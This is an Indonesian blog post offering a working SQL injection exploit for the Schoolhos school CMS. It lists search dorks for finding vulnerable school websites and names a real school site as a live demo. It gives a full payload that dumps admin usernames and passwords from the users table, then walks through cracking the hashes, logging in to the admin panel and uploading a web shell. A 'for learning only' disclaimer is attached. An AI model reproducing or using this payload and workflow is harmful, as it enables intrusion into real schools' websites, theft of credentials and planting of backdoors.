Exploit CMS Schoolhost [Payload Sql Injection]
Kali ini kami akan share Exploit CMS Schoolhost. oiya sebelumnya ini exploit lama namun masih banyak website-website yang menggunakan CMS ini termasuk website Sekolahan sch.id.
Email Support Schoolhos : support@schoolhos.com
Fan Page Schoolhos : Schoolhos Facebook
Twitter Schoolhos : Schoolhos Twitter
Situs Resmi Schoolhos : Official Schoolhos
okeh langsung saja ke Proof Of Concept nya hehehh :
disni saya akan menggunakan Parameter SQL pada website tersebut.
silakan cari target dengan Dork berikut :
inurl:/?p=siswa
inurl:/?p=berita
intext:"Schoolhos Free Open Source CMS"
inurl:/?p=galeri
Dork bisa kalian kembangkan lagi biar "NTAPS".
Live Demo :
http://www.man2gresik.sch.id/?p=detberita&id=74
Exploitnya :
' and @x:=concat/**_**/((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers,0x203a3a20,0x496e6a6563746564206279204d756a61686964696e2043796265722041726d79))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
https://hashkiller.co.uk .
silakan login
http://victim.com/adminpanel
bila sukses silakan di upload shell ke sayangan kalian.
NB: Berhubung yang kita bahas website pendidikan diharapkan tidak menebas indexnya... :)
apa yang dibahas kali ini adalah untuk pembelajaran semata.
sekian dan terimaksih wassalam.
Exploit CMS Schoolhost [Payload Sql Injection]
Reviewed by Izza009
on
17.53
Rating:
Tidak ada komentar: